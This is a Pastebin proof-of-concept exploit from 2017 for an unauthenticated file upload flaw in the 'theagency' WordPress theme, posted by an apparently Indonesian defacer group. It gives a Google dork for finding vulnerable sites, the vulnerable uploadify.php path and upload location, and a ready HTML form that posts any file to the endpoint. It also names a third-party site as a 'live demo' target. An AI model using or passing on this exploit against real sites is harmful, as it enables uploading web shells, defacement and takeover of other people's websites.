daily pastebin goal
50%
SHARE
TWEET

[POC] Wordpress Themes Theagency File Upload Vulnerability

Berandal666 Mar 11th, 2017 118 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##################################################################################
  2. # Exploit Title : Wordpress Themes Theagency File Upload Vulnerability
  3. # Author : Berandal
  4. # Google Dork: inurl:/wp-content/themes/theagency
  5. # Tested on: Win 7, Linux
  6. # Blog : http://www.maxteroit.com/
  7. # Video Proof : https://www.youtube.com/watch?v=Iuhj5wDOLbU
  8. #################################################################################
  9.  
  10. +-+-+-+-+-+-+-+-+
  11. |B|e|r|a|n|d|a|l|
  12. +-+-+-+-+-+-+-+-+
  13.  
  14. # [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/theagency/includes/uploadify/uploadify.php
  15.  
  16. # [!] File Location : http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploads/filename
  17.  
  18. #################################################################################
  19. # [*] CSRF:
  20. #################################################################################
  21. <html>
  22. <body>
  23. <form action="http://127.0.0.1/wp-content/themes/theagency/includes/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
  24. <label for="file">Filename:</label>
  25. <input type="file" name="Filedata" ><br>
  26. <input type="submit" name="submit" value="SIKAT!">
  27. </form>
  28. </body>
  29. </html>
  30. #################################################################################
  31. # [*] Live Demo:
  32. #################################################################################
  33. # http://birtandalgic.com/
  34. #################################################################################
  35. # [*] ABOUT:
  36. #################################################################################
  37. # Facebook: https://www.facebook.com/owlsquad.id
  38. # Twitter: https://www.twitter.com/id_berandal
  39. # Greetz : OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer
  40. #################################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top